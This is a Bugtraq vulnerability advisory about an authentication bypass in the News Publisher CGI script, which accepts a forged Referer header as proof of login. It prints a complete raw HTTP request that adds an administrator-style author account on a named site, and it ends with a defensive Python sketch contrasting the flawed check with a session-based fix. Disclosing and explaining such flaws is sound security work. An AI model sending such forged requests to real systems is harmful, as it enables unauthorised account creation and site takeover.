Bugtraq mailing list archives
News Publisher CGI Vulnerability
From: n30 <n30 () CGI-EXPERTS COM>
Date: Tue, 29 Aug 2000 21:30:09 -0700
Product: News Publisher
Versions: Tested v1.05, 1.05a, 1.05b and 1.06 (newest)
OS: Unix and WinNT
Vendor: Notified
Web Site: www.gwscripts.com

The Problem

Yet again, CGI authors use nested IF statements to decide what action to take upon an incoming request. This time the problem allows ppl to add an author to the 'authors.file' file. This can't be done through a web browser, since the script assumes that if the HTTP_REFERER field is the URL of the news.cgi script (the main script) then you must have completed the login process :). This assumption would be true if you were to use a browser, but.... it's easily faked using netcat. Therefore, by passing this raw HTTP request:

    POST /cgi-bin/news/news.cgi?addAuthor HTTP/1.0
    Connection: close
    User-Agent: n30/browser
    Host: www.speedy3d.com
    Referer: http://www.speedy3d.com/cgi-bin/news/news.cgi
    Content-type: application/x-www-form-urlencoded
    Content-length: 71

    author=n30&apassword=teapot&email=don () know com&name=n30&password=teapot

it is possible to add an author.

Exploit

I have included a perl script that will add a user into the authors.file for you with username "kid" and the password of your choice.

Patch

I suspect it will be very quick in arriving..

Extra

This is a real problem, since on older versions the author.file was readable (with Unix crypt passes); this hole sorta blows that outta the water! There are many sitez using this script and some would probably be regarded as large. Therefore I must ask you NOT to misuse the exploit script.

thanx....

n30
n30 () alldas de
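As an added illustration (not code from this advisory or from News Publisher), the Python sketch below models the Referer-based gate described above next to a server-side session gate that a fixed news.cgi would use instead; the script URL, the author store and the 'sid' cookie name are assumptions.

```python
import hashlib
import hmac
import secrets

# Assumed values for this illustration (not News Publisher's own code).
SCRIPT_URL = "http://www.example.com/cgi-bin/news/news.cgi"
SESSIONS = {}  # session id -> author name, held server-side

def referer_check(environ):
    """The gate described in the advisory: a request is treated as logged in
    whenever HTTP_REFERER equals the script's own URL. The client chooses
    that header, so it proves nothing about whether a login ever happened."""
    return environ.get("HTTP_REFERER", "") == SCRIPT_URL

def hash_password(password):
    """Unsalted SHA-256 for brevity; use a slow, salted KDF in real code."""
    return hashlib.sha256(password.encode()).hexdigest()

def login(author, password, authors):
    """Check credentials against the stored hash; on success mint a random
    session id that only the server-side table can vouch for."""
    stored = authors.get(author)
    if stored is None or not hmac.compare_digest(hash_password(password), stored):
        return None
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = author
    return sid

def session_check(environ):
    """Replacement gate: addAuthor is allowed only when the request carries a
    'sid' cookie that the server itself issued at login time."""
    for part in environ.get("HTTP_COOKIE", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name == "sid" and value in SESSIONS:
            return True
    return False

def authorised(environ):
    """Decision the CGI should make for '?addAuthor': ignore Referer entirely."""
    return session_check(environ)
```

A raw request with a matching Referer but no session cookie passes referer_check and fails authorised, which is the whole difference between the two gates.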